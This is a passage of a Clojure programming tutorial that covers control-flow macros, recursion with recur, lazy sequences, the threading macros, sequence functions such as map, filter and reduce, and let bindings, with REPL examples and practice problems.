Often, you want to perform some operation, and if it’s truthy, re-use that value without recomputing it. For this, we have when-let and if-let. These work just like when and let combined.

user=> (when-let [x (+ 1 2 3 4)] (str x)) "10" user=> (when-let [x (first [])] (str x)) nil

while evaluates an expression so long as its predicate is truthy. This is generally useful only for side effects, like prn or def; things that change the state of the world.

user=> (def x 0) #'user/x user=> (while (< x 5) #_=> (prn x) #_=> (def x (inc x))) 0 1 2 3 4 nil

cond (for “conditional”) is like a multiheaded if: it takes any number of test/expression pairs, and tries each test in turn. The first test which evaluates truthy causes the following expression to be evaluated; then cond returns that expression’s value.

user=> (cond #_=> (= 2 5) :nope #_=> (= 3 3) :yep #_=> (= 5 5) :cant-get-here #_=> :else :a-default-value) :yep

If you find yourself making several similar decisions based on a value, try condp, for “cond with predicate”. For instance, we might categorize a number based on some ranges:

(defn category "Determines the Saffir-Simpson category of a hurricane, by wind speed in meters/sec" [wind-speed] (condp <= wind-speed 70 :F5 58 :F4 49 :F3 42 :F2 :F1)) ; Default value user=> (category 10) :F1 user=> (category 50) :F3 user=> (category 100) :F5

condp generates code which combines the predicate <= with each number, and the value of wind-speed, like so:

(if (<= 70 wind-speed) :F5 (if (<= 58 wind-speed) :F4 (if (<= 49 wind-speed) :F3 (if (<= 42 wind-speed) :F2 :F1))))

Specialized macros like condp are less commonly used than if or when, but they still play an important role in simplifying repeated code. They clarify the meaning of complex expressions, making them easier to read and maintain.

Finally, there’s case, which works a little bit like a map of keys to values–only the values are code, to be evaluated. You can think of case like (condp = ...), trying to match an expression to a particular branch for which it is equal.

(defn with-tax "Computes the total cost, with tax, of a purchase in the given state." [state subtotal] (case state :WA (* 1.065 subtotal) :OR subtotal :CA (* 1.075 subtotal) ; ... 48 other states ... subtotal)) ; a default case

Unlike cond and condp, case does not evaluate its tests in order. It jumps immediately to the matching expression. This makes case much faster when there are many branches to take–at the cost of reduced generality.

Recursion

Previously, we defined recursive functions by having those functions call themselves explicitly.

(defn sum [numbers] (if-let [n (first numbers)] (+ n (sum (rest numbers))) 0)) user=> (sum (range 10)) 45

But this approach breaks down when we have the function call itself deeply, over and over again.

user=> (sum (range 100000)) StackOverflowError clojure.core/range/fn--4269 (core.clj:2664)

Every time you call a function, the arguments for that function are stored in memory, in a region called the stack. They remain there for as long as the function is being called–including any deeper function calls.

(+ n (sum (rest numbers)))

In order to add n and (sum (rest numbers)), we have to call sum first–while holding onto the memory for n and numbers. We can’t re-use that memory until every single recursive call has completed. Clojure complains, after tens of thousands of stack frames are in use, that it has run out of space in the stack and can allocate no more.

But consider this variation on sum:

(defn sum ([numbers] (sum 0 numbers)) ([subtotal numbers] (if-let [n (first numbers)] (recur (+ subtotal n) (rest numbers)) subtotal))) user=> (sum (range 100000)) 4999950000

We’ve added an additional parameter to the function. In its two-argument form, sum now takes an accumulator, subtotal, which represents the count so far. In addition, recur has taken the place of sum. Notice, however, that the final expression to be evaluated is not +, but sum (viz recur) itself. We don’t need to hang on to any of the variables in this function any more, because the final return value won’t depend on them. recur hints to the Clojure compiler that we don’t need to hold on to the stack, and can re-use that space for other things. This is called a tail-recursive function, and it requires only a single stack frame no matter how deep the recursive calls go.

Use recur wherever possible. It requires much less memory and is much faster than the explicit recursion.

You can also use recur within the context of the loop macro, where it acts just like an unnamed recursive function with initial values provided. Think of it, perhaps, like a recursive let.

user=> (loop [i 0 nums []] (if (< 10 i) nums (recur (inc i) (conj nums i)))) [0 1 2 3 4 5 6 7 8 9 10]

Laziness

In chapter 4 we mentioned that most of the sequences in Clojure, like map, filter, iterate, repeatedly, and so on, were lazy: they did not evaluate any of their elements until required. This too is provided by a macro, called lazy-seq.

(defn integers [x] (lazy-seq (cons x (integers (inc x))))) user=> (def xs (integers 0)) #'user/xs

This sequence does not terminate; it is infinitely recursive. Yet it returned instantaneously. lazy-seq interrupted that recursion and restructured it into a sequence which constructs elements only when they are requested.

user=> (take 10 xs) (0 1 2 3 4 5 6 7 8 9)

When using lazy-seq and its partner lazy-cat, you don’t have to use recur–or even be tail-recursive. The macros interrupt each level of recursion, preventing stack overflows.

You can also delay evaluation of some expressions until later, using delay and deref.

user=> (def x (delay (prn "computing a really big number!") (last (take 10000000 (iterate inc 0))))) #'user/x ; Did nothing, returned immediately user=> (deref x) "computing a really big number!" ; Now we have to wait! 9999999

List comprehensions

Combining recursion and laziness is the list comprehension macro, for. In its simplest form, for works like map:

user=> (for [x (range 10)] (- x)) (0 -1 -2 -3 -4 -5 -6 -7 -8 -9)

Like let, for takes a vector of bindings. Unlike let, however, for binds its variables to each possible combination of elements in their corresponding sequences.

user=> (for [x [1 2 3] y [:a :b]] [x y]) ([1 :a] [1 :b] [2 :a] [2 :b] [3 :a] [3 :b])

“For each x in the sequence [1 2 3], and for each y in the sequence [:a :b], find all [x y] pairs.” Note that the rightmost variable y iterates the fastest.

Like most sequence functions, the for macro yields lazy sequences. You can filter them with take, filter, et al like any other sequence. Or you can use :while to tell for when to stop, or :when to filter out combinations of elements.

(for [x (range 5) y (range 5) :when (and (even? x) (odd? y))] [x y]) ([0 1] [0 3] [2 1] [2 3] [4 1] [4 3])

Clojure includes a rich smörgåsbord of control-flow constructs; we’ll meet new ones throughout the book.

The threading macros

Sometimes you want to thread a computation through several expressions, like a chain. Object-oriented languages like Ruby or Java are well-suited to this style:

1.9.3p385 :004 > (0..10).select(&:odd?).reduce(&:+) 25

Start with the range 0 to 10, then call select on that range, with the function odd?. Finally, take that sequence of numbers, and reduce it with the + function.

The Clojure threading macros do the same by restructuring a sequence of expressions, inserting each expression as the first (or final) argument in the next expression.

user=> (pprint (clojure.walk/macroexpand-all '(->> (range 10) (filter odd?) (reduce +)))) (reduce + (filter odd? (range 10))) user=> (->> (range 10) (filter odd?) (reduce +)) 25

->> took (range 10) and inserted it at the end of (filter odd?), forming (filter odd? (range 10)). Then it took that expression and inserted it at the end of (reduce +). In essence, ->> flattens and reverses a nested chain of operations.

->, by contrast, inserts each form in as the first argument in the following expression.

user=> (pprint (clojure.walk/macroexpand-all '(-> {:proton :fermion} (assoc :photon :boson) (assoc :neutrino :fermion)))) (assoc (assoc {:proton :fermion} :photon :boson) :neutrino :fermion) user=> (-> {:proton :fermion} (assoc :photon :boson) (assoc :neutrino :fermion)) {:neutrino :fermion, :photon :boson, :proton :fermion}

Clojure isn’t just function-oriented in its syntax; it can be object-oriented, and stack-oriented, and array-oriented, and so on–and mix all of these styles freely, in a controlled way. If you don’t like the way the language fits a certain problem, you can write a macro which defines a new language, specifically for that subproblem.

cond, condp and case, for example, express a language for branching based on predicates. ->, ->>, and doto express object-oriented and other expression-chaining languages.

  • core.match is a set of macros which express powerful pattern-matching and substitution languages.
  • core.logic expresses syntax for logic programming, for finding values which satisfy complex constraints.
  • core.async restructures Clojure code into asynchronous forms so they can do many things at once.
  • For those with a twisted sense of humor, Swiss Arrows extends the threading macros into evil–but delightfully concise!–forms.

We’ll see a plethora of macros, from simple to complex, through the course of this book. Each one shares the common pattern of simplifying code; reducing tangled or verbose expressions into something more concise, more meaningful, better suited to the problem at hand.

When to use macros

While it’s important to be aware of the purpose and behavior of the macro system, you don’t need to write your own macros to be productive with Clojure. For now, you’ll be just fine writing code which uses the existing macros in the language. When you do need to delve deeper, come back to this guide and experiment. It’ll take some time to sink in.

First, know that writing macros is tricky, even for experts. It requires you to think at two levels simultaneously, and to be mindful of the distinction between expression and underlying evaluation. Writing a macro is essentially extending the language, the compiler, the syntax and evaluation model of Clojure, by restructuring arbitrary expressions into ones the evaluation system understands. This is hard, and it’ll take practice to get used to.

In addition, Clojure macros come with some important restrictions. Because they’re expanded prior to evaluation, macros are invisible to functions. They can’t be composed functionally–you can’t (map or ...), for instance.

So in general, if you can solve a problem without writing a macro, don’t write one. It’ll be easier to debug, easier to understand, and easier to compose later. Only reach for macros when you need new syntax, or when performance demands the code be transformed at compile time.

When you do write a macro, consider its scope carefully. Keep the transformation simple; and do as much in normal functions as possible. Provide an escape hatch where possible, by doing most of the work in a function, and writing a small wrapper macro which calls that function. Finally, remember the distinction between code and what that code evaluates to. Use let whenever a value is to be re-used, to prevent it being evaluated twice by accident.

For a deeper exploration of Clojure macros in a real-world application, try Language Power.

Review

In Chapter 4, deeply nested expressions led to the desire for a simpler, more direct expression of a chain of sequence operations. We learned that the Clojure compiler first expands expressions before evaluating them, using macros–special functions which take code and return other code. We used macros to define the short-circuiting or operator, and followed that with a tour of basic control flow, recursion, laziness, list comprehensions, and chained expressions. Finally, we learned a bit about when and how to write our own macros.

Throughout this chapter we’ve brushed against the idea of side effects: things which change the outside world. We might change a var with def, or print a message to the screen with prn. Real languages must model a continually shifting universe, which leads us to Chapter Six: Side effects and state.

Problems

  1. Using the control flow constructs we’ve learned, write a schedule function which, given an hour of the day, returns what you’ll be doing at that time. (schedule 18), for me, returns :dinner.

  2. Using the threading macros, find how many numbers from 0 to 9999 are palindromes: identical when written forwards and backwards. 121 is a palindrome, as is 7447 and 5, but not 12 or 953.

  3. Write a macro id which takes a function and a list of args: (id f a b c), and returns an expression which calls that function with the given args: (f a b c).

  4. Write a macro log which uses a var, logging-enabled, to determine whether or not to print an expression to the console at compile time. If logging-enabled is false, (log :hi) should macroexpand to nil. If logging-enabled is true, (log :hi) should macroexpand to (prn :hi). Why would you want to do this check during compilation, instead of when running the program? What might you lose?

  5. (Advanced) Using the rationalize function, write a macro exact which rewrites any use of +, -, *, or / to force the use of ratios instead of floating-point numbers. (* 2452.45 100) returns 245244.99999999997, but (exact (* 2452.45 100)) should return 245245N

In Chapter 3, we discovered functions as a way to abstract expressions; to rephrase a particular computation with some parts missing. We used functions to transform a single value. But what if we want to apply a function to more than one value at once? What about sequences?

For example, we know that (inc 2) increments the number 2. What if we wanted to increment every number in the vector [1 2 3], producing [2 3 4]?

user=> (inc [1 2 3]) ClassCastException clojure.lang.PersistentVector cannot be cast to java.lang.Number clojure.lang.Numbers.inc (Numbers.java:110)

Clearly inc can only work on numbers, not on vectors. We need a different kind of tool.

A direct approach

Let’s think about the problem in concrete terms. We want to increment each of three elements: the first, second, and third. We know how to get an element from a sequence by using nth, so let’s start with the first number, at index 0:

user=> (def numbers [1 2 3]) #'user/numbers user=> (nth numbers 0) 1 user=> (inc (nth numbers 0)) 2

So there’s the first element incremented. Now we can do the second:

user=> (inc (nth numbers 1)) 3 user=> (inc (nth numbers 2)) 4

And it should be straightforward to combine these into a vector…

user=> [(inc (nth numbers 0)) (inc (nth numbers 1)) (inc (nth numbers 2))] [2 3 4]

Success! We’ve incremented each of the numbers in the list! How about a list with only two elements?

user=> (def numbers [1 2]) #'user/numbers user=> [(inc (nth numbers 0)) (inc (nth numbers 1)) (inc (nth numbers 2))] IndexOutOfBoundsException clojure.lang.PersistentVector.arrayFor (PersistentVector.java:107)

Shoot. We tried to get the element at index 2, but couldn’t, because numbers only has indices 0 and 1. Clojure calls that “index out of bounds”.

We could just leave off the third expression in the vector; taking only elements 0 and 1. But the problem actually gets much worse, because we’d need to make this change every time we wanted to use a different sized vector. And what of a vector with 1000 elements? We’d need 1000 (inc (nth numbers ...)) expressions! Down this path lies madness.

Let’s back up a bit, and try a slightly smaller problem.

Recursion

What if we just incremented the first number in the vector? How would that work? We know that first finds the first element in a sequence, and rest finds all the remaining ones.

user=> (first [1 2 3]) 1 user=> (rest [1 2 3]) (2 3)

So there’s the pieces we’d need. To glue them back together, we can use a function called cons, which says “make a list beginning with the first argument, followed by all the elements in the second argument”.

user=> (cons 1 [2]) (1 2) user=> (cons 1 [2 3]) (1 2 3) user=> (cons 1 [2 3 4]) (1 2 3 4)

OK so we can split up a sequence, increment the first part, and join them back together. Not so hard, right?

(defn inc-first [nums] (cons (inc (first nums)) (rest nums))) user=> (inc-first [1 2 3 4]) (2 2 3 4)

Hey, there we go! First element changed. Will it work with any length list?

user=> (inc-first [5]) (6) user=> (inc-first []) NullPointerException clojure.lang.Numbers.ops (Numbers.java:942)

Shoot. We can’t increment the first element of this empty vector, because it doesn’t have a first element.

user=> (first []) nil user=> (inc nil) NullPointerException clojure.lang.Numbers.ops (Numbers.java:942)

So there are really two cases for this function. If there is a first element in nums, we’ll increment it as normal. If there’s no such element, we’ll return an empty list. To express this kind of conditional behavior, we’ll use a Clojure special form called if:

user=> (doc if) ------------------------- if (if test then else?) Special Form Evaluates test. If not the singular values nil or false, evaluates and yields then, otherwise, evaluates and yields else. If else is not supplied it defaults to nil. Please see http://clojure.org/special_forms#if

To confirm our intuition:

user=> (if true :a :b) :a user=> (if false :a :b) :b

Seems straightforward enough.

(defn inc-first [nums] (if (first nums) ; If there's a first number, build a new list with cons (cons (inc (first nums)) (rest nums)) ; If there's no first number, just return an empty list (list))) user=> (inc-first []) () user=> (inc-first [1 2 3]) (2 2 3)

Success! Now we can handle both cases: empty sequences, and sequences with things in them. Now how about incrementing that second number? Let’s stare at that code for a bit.

(rest nums)

Hang on. That list–(rest nums)–that’s a list of numbers too. What if we… used our inc-first function on that list, to increment its first number? Then we’d have incremented both the first and the second element.

(defn inc-more [nums] (if (first nums) (cons (inc (first nums)) (inc-more (rest nums))) (list))) user=> (inc-more [1 2 3 4]) (2 3 4 5)

Odd. That didn’t just increment the first two numbers. It incremented all the numbers. We fell into the complete solution entirely by accident. What happened here?

Well first we… yes, we got the number one, and incremented it. Then we stuck that onto (inc-first [2 3 4]), which got two, and incremented it. Then we stuck that two onto (inc-first [3 4]), which got three, and then we did the same for four. Only that time around, at the very end of the list, (rest [4]) would have been empty. So when we went to get the first number of the empty list, we took the second branch of the if, and returned the empty list.

Having reached the bottom of the function calls, so to speak, we zip back up the chain. We can imagine this function turning into a long string of cons calls, like so:

(cons 2 (cons 3 (cons 4 (cons 5 '())))) (cons 2 (cons 3 (cons 4 '(5)))) (cons 2 (cons 3 '(4 5))) (cons 2 '(3 4 5)) '(2 3 4 5)

This technique is called recursion, and it is a fundamental principle in working with collections, sequences, trees, or graphs… any problem which has small parts linked together. There are two key elements in a recursive program:

  1. Some part of the problem which has a known solution
  2. A relationship which connects one part of the problem to the next

Incrementing the elements of an empty list returns the empty list. This is our base case: the ground to build on. Our inductive case, also called the recurrence relation, is how we broke the problem up into incrementing the first number in the sequence, and incrementing all the numbers in the rest of the sequence. The if expression bound these two cases together into a single function; a function defined in terms of itself.

Once the initial step has been taken, every step can be taken.

user=> (inc-more [1 2 3 4 5 6 7 8 9 10 11 12]) (2 3 4 5 6 7 8 9 10 11 12 13)

This is the beauty of a recursive function; folding an unbounded stream of computation over and over, onto itself, until only a single step remains.

Generalizing from inc

We set out to increment every number in a vector, but nothing in our solution actually depended on inc. It just as well could have been dec, or str, or keyword. Let’s parameterize our inc-more function to use any transformation of its elements:

(defn transform-all [f xs] (if (first xs) (cons (f (first xs)) (transform-all f (rest xs))) (list)))

Because we could be talking about any kind of sequence, not just numbers, we’ve named the sequence xs, and its first element x. We also take a function f as an argument, and that function will be applied to each x in turn. So not only can we increment numbers…

user=> (transform-all inc [1 2 3 4]) (2 3 4 5)

…but we can turn strings to keywords…

user=> (transform-all keyword ["bell" "hooks"]) (:bell :hooks)

…or wrap every element in a list:

user=> (transform-all list [:codex :book :manuscript]) ((:codex) (:book) (:manuscript))

In short, this function expresses a sequence in which each element is some function applied to the corresponding element in the underlying sequence. This idea is so important that it has its own name, in mathematics, Clojure, and other languages. We call it map.

user=> (map inc [1 2 3 4]) (2 3 4 5)

You might remember maps as a datatype in Clojure, too–they’re dictionaries that relate keys to values.

{:year 1969 :event "moon landing"}

The function map relates one sequence to another. The type map relates keys to values. There is a deep symmetry between the two: maps are usually sparse, and the relationships between keys and values may be arbitrarily complex. The map function, on the other hand, usually expresses the same type of relationship, applied to a series of elements in fixed order.

Building sequences

Recursion can do more than just map. We can use it to expand a single value into a sequence of values, each related by some function. For instance:

(defn expand [f x count] (if (pos? count) (cons x (expand f (f x) (dec count)))))

Our base case is x itself, followed by the sequence beginning with (f x). That sequence in turn expands to (f (f x)), and then (f (f (f x))), and so on. Each time we call expand, we count down by one using dec. Once the count is zero, the if returns nil, and evaluation stops. If we start with the number 0 and use inc as our function:

user=> user=> (expand inc 0 10) (0 1 2 3 4 5 6 7 8 9)

Clojure has a more general form of this function, called iterate.

user=> (take 10 (iterate inc 0)) (0 1 2 3 4 5 6 7 8 9)

Since this sequence is infinitely long, we’re using take to select only the first 10 elements. We can construct more complex sequences by using more complex functions:

user=> (take 10 (iterate (fn [x] (if (odd? x) (+ 1 x) (/ x 2))) 10)) (10 5 6 3 4 2 1 2 1 2)

Or build up strings:

user=> (take 5 (iterate (fn [x] (str x "o")) "y")) ("y" "yo" "yoo" "yooo" "yoooo")

iterate is extremely handy for working with infinite sequences, and has some partners in crime. repeat, for instance, constructs a sequence where every element is the same.

user=> (take 10 (repeat :hi)) (:hi :hi :hi :hi :hi :hi :hi :hi :hi :hi) user=> (repeat 3 :echo) (:echo :echo :echo)

And its close relative repeatedly simply calls a function (f) to generate an infinite sequence of values, over and over again, without any relationship between elements. For an infinite sequence of random numbers:

user=> (rand) 0.9002678382322784 user=> (rand) 0.12375594203332863 user=> (take 3 (repeatedly rand)) (0.44442397843046755 0.33668691162169784 0.18244875487846746)

Notice that calling (rand) returns a different number each time. We say that rand is an impure function, because it cannot simply be replaced by the same value every time. It does something different each time it’s called.

There’s another very handy sequence function specifically for numbers: range, which generates a sequence of numbers between two points. (range n) gives n successive integers starting at 0. (range n m) returns integers from n to m-1. (range n m step) returns integers from n to m, but separated by step.

user=> (range 5) (0 1 2 3 4) user=> (range 2 10) (2 3 4 5 6 7 8 9) user=> (range 0 100 5) (0 5 10 15 20 25 30 35 40 45 50 55 60 65 70 75 80 85 90 95)

To extend a sequence by repeating it forever, use cycle:

user=> (take 10 (cycle [1 2 3])) (1 2 3 1 2 3 1 2 3 1)

Transforming sequences

Given a sequence, we often want to find a related sequence. map, for instance, applies a function to each element–but has a few more tricks up its sleeve.

user=> (map (fn [n vehicle] (str "I've got " n " " vehicle "s")) [0 200 9] ["car" "train" "kiteboard"]) ("I've got 0 cars" "I've got 200 trains" "I've got 9 kiteboards")

If given multiple sequences, map calls its function with one element from each sequence in turn. So the first value will be (f 0 "car"), the second (f 200 "train"), and so on. Like a zipper, map folds together corresponding elements from multiple collections. To sum three vectors, column-wise:

user=> (map + [1 2 3] [4 5 6] [7 8 9]) (12 15 18)

If one sequence is bigger than another, map stops at the end of the smaller one. We can exploit this to combine finite and infinite sequences. For example, to number the elements in a vector:

user=> (map (fn [index element] (str index ". " element)) (iterate inc 0) ["erlang" "ruby" "haskell"]) ("0. erlang" "1. ruby" "2. haskell")

Transforming elements together with their indices is so common that Clojure has a special function for it: map-indexed:

user=> (map-indexed (fn [index element] (str index ". " element)) ["erlang" "ruby" "haskell"]) ("0. erlang" "1. ruby" "2. haskell")

You can also tack one sequence onto the end of another, like so:

user=> (concat [1 2 3] [:a :b :c] [4 5 6]) (1 2 3 :a :b :c 4 5 6)

Another way to combine two sequences is to riffle them together, using interleave.

user=> (interleave [:a :b :c] [1 2 3]) (:a 1 :b 2 :c 3)

And if you want to insert a specific element between each successive pair in a sequence, try interpose:

user=> (interpose :and [1 2 3 4]) (1 :and 2 :and 3 :and 4)

To reverse a sequence, use reverse.

user=> (reverse [1 2 3]) (3 2 1) user=> (reverse "woolf") (\f \l \o \o \w)

Strings are sequences too! Each element of a string is a character, written \f. You can rejoin those characters into a string with apply str:

user=> (apply str (reverse "woolf")) "floow"

…and break strings up into sequences of chars with seq.

user=> (seq "sato") (\s \a \t \o)

To randomize the order of a sequence, use shuffle.

user=> (shuffle [1 2 3 4]) [3 1 2 4] user=> (apply str (shuffle (seq "abracadabra"))) "acaadabrrab"

Subsequences

We’ve already seen take, which selects the first n elements. There’s also drop, which removes the first n elements.

user=> (range 10) (0 1 2 3 4 5 6 7 8 9) user=> (take 3 (range 10)) (0 1 2) user=> (drop 3 (range 10)) (3 4 5 6 7 8 9)

And for slicing apart the other end of the sequence, we have take-last and drop-last:

user=> (take-last 3 (range 10)) (7 8 9) user=> (drop-last 3 (range 10)) (0 1 2 3 4 5 6)

take-while and drop-while work just like take and drop, but use a function to decide when to cut.

user=> (take-while pos? [3 2 1 0 -1 -2 10]) (3 2 1)

In general, one can cut a sequence in twain by using split-at, and giving it a particular index. There’s also split-with, which uses a function to decide when to cut.

(split-at 4 (range 10)) [(0 1 2 3) (4 5 6 7 8 9)] user=> (split-with number? [1 2 3 :mark 4 5 6 :mark 7]) [(1 2 3) (:mark 4 5 6 :mark 7)]

Notice that because indexes start at zero, sequence functions tend to have predictable numbers of elements. (split-at 4) yields four elements in the first collection, and ensures the second collection begins at index four. (range 10) has ten elements, corresponding to the first ten indices in a sequence. (range 3 5) has two (since 5 - 3 is two) elements. These choices simplify the definition of recursive functions as well.

We can select particular elements from a sequence by applying a function. To find all positive numbers in a list, use filter:

user=> (filter pos? [1 5 -4 -7 3 0]) (1 5 3)

filter looks at each element in turn, and includes it in the resulting sequence only if (f element) returns a truthy value. Its complement is remove, which only includes those elements where (f element) is false or nil.

user=> (remove string? [1 "turing" :apple]) (1 :apple)

Finally, one can group a sequence into chunks using partition, partition-all, or partition-by. For instance, one might group alternating values into pairs:

user=> (partition 2 [:cats 5 :bats 27 :crocodiles 0]) ((:cats 5) (:bats 27) (:crocodiles 0))

Or separate a series of numbers into negative and positive runs:

(user=> (partition-by neg? [1 2 3 2 1 -1 -2 -3 -2 -1 1 2]) ((1 2 3 2 1) (-1 -2 -3 -2 -1) (1 2))

Collapsing sequences

After transforming a sequence, we often want to collapse it in some way; to derive some smaller value. For instance, we might want the number of times each element appears in a sequence:

user=> (frequencies [:meow :mrrrow :meow :meow]) {:meow 3, :mrrrow 1}

Or to group elements by some function:

user=> (pprint (group-by :first [{:first "Li" :last "Zhou"} {:first "Sarah" :last "Lee"} {:first "Sarah" :last "Dunn"} {:first "Li" :last "O'Toole"}])) {"Li" [{:last "Zhou", :first "Li"} {:last "O'Toole", :first "Li"}], "Sarah" [{:last "Lee", :first "Sarah"} {:last "Dunn", :first "Sarah"}]}

Here we’ve taken a sequence of people with first and last names, and used the :first keyword (which can act as a function!) to look up those first names. group-by used that function to produce a map of first names to lists of people–kind of like an index.

In general, we want to combine elements together in some way, using a function. Where map treated each element independently, reducing a sequence requires that we bring some information along. The most general way to collapse a sequence is reduce.

user=> (doc reduce) ------------------------- clojure.core/reduce ([f coll] [f val coll]) f should be a function of 2 arguments. If val is not supplied, returns the result of applying f to the first 2 items in coll, then applying f to that result and the 3rd item, etc. If coll contains no items, f must accept no arguments as well, and reduce returns the result of calling f with no arguments. If coll has only 1 item, it is returned and f is not called. If val is supplied, returns the result of applying f to val and the first item in coll, then applying f to that result and the 2nd item, etc. If coll contains no items, returns val and f is not called.

That’s a little complicated, so we’ll start small. We need a function, f, which combines successive elements of the sequence. (f state element) will return the state for the next invocation of f. As f moves along the sequence, it carries some changing state with it. The final state is the return value of reduce.

user=> (reduce + [1 2 3 4]) 10

reduce begins by calling (+ 1 2), which yields the state 3. Then it calls (+ 3 3), which yields 6. Then (+ 6 4), which returns 10. We’ve taken a function over two elements, and used it to combine all the elements. Mathematically, we could write:

1 + 2 + 3 + 4 3 + 3 + 4 6 + 4 10

So another way to look at reduce is like sticking a function between each pair of elements. To see the reducing process in action, we can use reductions, which returns a sequence of all the intermediate states.

user=> (reductions + [1 2 3 4]) (1 3 6 10)

Oftentimes we include a default state to start with. For instance, we could start with an empty set, and add each element to it as we go along:

user=> (reduce conj #{} [:a :b :b :b :a :a]) #{:a :b}

Reducing elements into a collection has its own name: into. We can conj [key value] vectors into a map, for instance, or build up a list:

user=> (into {} [[:a 2] [:b 3]]) {:a 2, :b 3} user=> (into (list) [1 2 3 4]) (4 3 2 1)

Because elements added to a list appear at the beginning, not the end, this expression reverses the sequence. Vectors conj onto the end, so to emit the elements in order, using reduce, we might try:

user=> (reduce conj [] [1 2 3 4 5]) (reduce conj [] [1 2 3 4 5]) [1 2 3 4 5]

Which brings up an interesting thought: this looks an awful lot like map. All that’s missing is some kind of transformation applied to each element.

(defn my-map [f coll] (reduce (fn [output element] (conj output (f element))) [] coll)) user=> (my-map inc [1 2 3 4]) [2 3 4 5]

Huh. map is just a special kind of reduce. What about, say, take-while?

(defn my-take-while [f coll] (reduce (fn [out elem] (if (f elem) (conj out elem) (reduced out))) [] coll))

We’re using a special function here, reduced, to indicate that we’ve completed our reduction early and can skip the rest of the sequence.

user=> (my-take-while pos? [2 1 0 -1 0 1 2]) [2 1]

reduce really is the uberfunction over sequences. Almost any operation on a sequence can be expressed in terms of a reduce–though for various reasons, many of the Clojure sequence functions are not written this way. For instance, take-while is actually defined like so:

user=> (source take-while) (defn take-while "Returns a lazy sequence of successive items from coll while (pred item) returns true. pred must be free of side-effects." {:added "1.0" :static true} [pred coll] (lazy-seq (when-let [s (seq coll)] (when (pred (first s)) (cons (first s) (take-while pred (rest s)))))))

There’s a few new pieces here, but the structure is essentially the same as our initial attempt at writing map. When the predicate matches the first element, cons the first element onto take-while, applied to the rest of the sequence. That lazy-seq construct allows Clojure to compute this sequence as required, instead of right away. It defers execution to a later time.

Most of Clojure’s sequence functions are lazy. They don’t do anything until needed. For instance, we can increment every number from zero to infinity:

user=> (def infseq (map inc (iterate inc 0))) #'user/infseq user=> (realized? infseq) false

That function returned immediately. Because it hasn’t done any work yet, we say the sequence is unrealized. It doesn’t increment any numbers at all until we ask for them:

user=> (take 10 infseq) (1 2 3 4 5 6 7 8 9 10) user=> (realized? infseq) true

Lazy sequences also remember their contents, once evaluated, for faster access.

Putting it all together

We’ve seen how recursion generalizes a function over one thing into a function over many things, and discovered a rich landscape of recursive functions over sequences. Now let’s use our knowledge of sequences to solve a more complex problem: find the sum of the products of consecutive pairs of the first 1000 odd integers.

First, we’ll need the integers. We can start with 0, and work our way up to infinity. To save time printing an infinite number of integers, we’ll start with just the first 10.

user=> (take 10 (iterate inc 0)) (0 1 2 3 4 5 6 7 8 9)

Now we need to find only the ones which are odd. Remember, filter pares down a sequence to only those elements which pass a test.

user=> (take 10 (filter odd? (iterate inc 0))) (1 3 5 7 9 11 13 15 17 19)

For consecutive pairs, we want to take [1 3 5 7 ...] and find a sequence like ([1 3] [3 5] [5 7] ...). That sounds like a job for partition:

user=> (take 3 (partition 2 (filter odd? (iterate inc 0)))) ((1 3) (5 7) (9 11))

Not quite right–this gave us non-overlapping pairs, but we wanted overlapping ones too. A quick check of (doc partition) reveals the step parameter:

user=> (take 3 (partition 2 1 (filter odd? (iterate inc 0)))) ((1 3) (3 5) (5 7))

Now we need to find the product for each pair. Given a pair, multiply the two pieces together… yes, that sounds like map:

user=> (take 3 (map (fn [pair] (* (first pair) (second pair))) (partition 2 1 (filter odd? (iterate inc 0))))) (3 15 35)

Getting a bit unwieldy, isn’t it? Only one final step: sum all those products. We’ll adjust the take to include the first 1000, not the first 3, elements.

user=> (reduce + (take 1000 (map (fn [pair] (* (first pair) (second pair))) (partition 2 1 (filter odd? (iterate inc 0))))) 1335333000

The sum of the first thousand products of consecutive pairs of the odd integers starting at 0. See how each part leads to the next? This expression looks a lot like the way we phrased the problem in English–but both English and Lisp expressions are sort of backwards, in a way. The part that happens first appears deepest, last, in the expression. In a chain of reasoning like this, it’d be nicer to write it in order.

user=> (->> 0 (iterate inc) (filter odd?) (partition 2 1) (map (fn [pair] (* (first pair) (second pair)))) (take 1000) (reduce +)) 1335333000

Much easier to read: now everything flows in order, from top to bottom, and we’ve flattened out the deeply nested expressions into a single level. This is how object-oriented languages structure their expressions: as a chain of function invocations, each acting on the previous value.

But how is this possible? Which expression gets evaluated first? (take 1000) isn’t even a valid call–where’s its second argument? How are any of these forms evaluated?

What kind of arcane function is ->>?

All these mysteries, and more, in Chapter 5: Macros.

Problems

  1. Write a function to find out if a string is a palindrome–that is, if it looks the same forwards and backwards.
  2. Find the number of ‘c’s in “abracadabra”.
  3. Write your own version of filter.
  4. Find the first 100 prime numbers: 2, 3, 5, 7, 11, 13, 17, ….

We left off last chapter with a question: what are verbs, anyway? When you evaluate (type :mary-poppins), what really happens?

user=> (type :mary-poppins) clojure.lang.Keyword

To understand how type works, we’ll need several new ideas. First, we’ll expand on the notion of symbols as references to other values. Then we’ll learn about functions: Clojure’s verbs. Finally, we’ll use the Var system to explore and change the definitions of those functions.

Let bindings

We know that symbols are names for things, and that when evaluated, Clojure replaces those symbols with their corresponding values. +, for instance, is a symbol which points to the verb #<core$_PLUS_ clojure.core$_PLUS_@12992c>.

user=> + #<core$_PLUS_ clojure.core$_PLUS_@12992c>

When you try to use a symbol which has no defined meaning, Clojure refuses:

user=> cats CompilerException java.lang.RuntimeException: Unable to resolve symbol: cats in this context, compiling:(NO_SOURCE_PATH:0:0)

But we can define a meaning for a symbol within a specific expression, using let.

user=> (let [cats 5] (str "I have " cats " cats.")) "I have 5 cats."

The let expression first takes a vector of bindings: alternating symbols and values that those symbols are bound to, within the remainder of the expression. “Let the symbol cats be 5, and construct a string composed of "I have ", cats, and " cats".

Let bindings apply only within the let expression itself. They also override any existing definitions for symbols at that point in the program. For instance, we can redefine addition to mean subtraction, for the duration of a let:

user=> (let [+ -] (+ 2 3)) -1

But that definition doesn’t apply outside the let:

user=> (+ 2 3) 5

We can also provide multiple bindings. Since Clojure doesn’t care about spacing, alignment, or newlines, I’ll write this on multiple lines for clarity.

user=> (let [person "joseph" num-cats 186] (str person " has " num-cats " cats!")) "joseph has 186 cats!"

When multiple bindings are given, they are evaluated in order. Later bindings can use previous bindings.

user=> (let [cats 3 legs (* 4 cats)] (str legs " legs all together")) "12 legs all together"

So fundamentally, let defines the meaning of symbols within an expression. When Clojure evaluates a let, it replaces all occurrences of those symbols in the rest of the let expression with their corresponding values, then evaluates the rest of the expression.

Functions

